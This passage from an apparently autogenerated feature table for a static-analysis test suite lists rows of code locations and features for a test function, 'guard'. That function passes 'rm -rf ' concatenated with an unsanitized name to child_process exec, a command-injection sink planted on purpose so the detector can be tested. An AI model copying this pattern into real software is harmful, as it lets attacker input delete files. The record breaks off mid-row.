autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:18:189:21 | name | CalleeFlexibleAccessPath | path.exist | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:18:189:21 | name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:18:189:21 | name | calleeImports | path | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:18:189:21 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:18:189:21 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:18:189:21 | name | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:18:189:21 | name | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:18:189:21 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:18:189:21 | name | receiverName | path | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:3:190:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:3:190:4 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:3:190:4 | cp | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:3:190:4 | cp | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:3:190:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:3:190:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:3:190:9 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:3:190:9 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:3:190:9 | cp.exec | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:3:190:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:3:190:27 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:3:190:27 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:3:190:27 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:3:190:27 | cp.exec ... + name) | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:3:190:27 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:3:190:27 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:3:190:27 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:3:190:27 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:3:190:27 | exceptional return of cp.exec ... + name) | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:3:190:27 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:6:190:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:6:190:9 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:6:190:9 | exec | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:6:190:9 | exec | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:6:190:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:11:190:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:11:190:19 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:11:190:19 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:11:190:19 | "rm -rf " | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:11:190:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:11:190:19 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:11:190:26 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:11:190:26 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:11:190:26 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:11:190:26 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:11:190:26 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:11:190:26 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:11:190:26 | "rm -rf " + name | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:11:190:26 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:11:190:26 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:23:190:26 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:23:190:26 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:23:190:26 | name | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:23:190:26 | name | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:23:190:26 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:23:190:26 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:2:193:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:2:193:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:2:193:3 | cp | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:2:193:3 | cp | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:2:193:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:2:193:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:2:193:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:2:193:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:2:193:8 | cp.exec | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:2:193:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:2:193:26 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:2:193:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:2:193:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:2:193:26 | cp.exec ... + name) | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:2:193:26 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:2:193:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:2:193:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:2:193:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:2:193:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:2:193:26 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:5:193:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:5:193:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:5:193:8 | exec | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:5:193:8 | exec | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:5:193:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:10:193:18 | "rm -rf " | contextFunctionInterfaces | 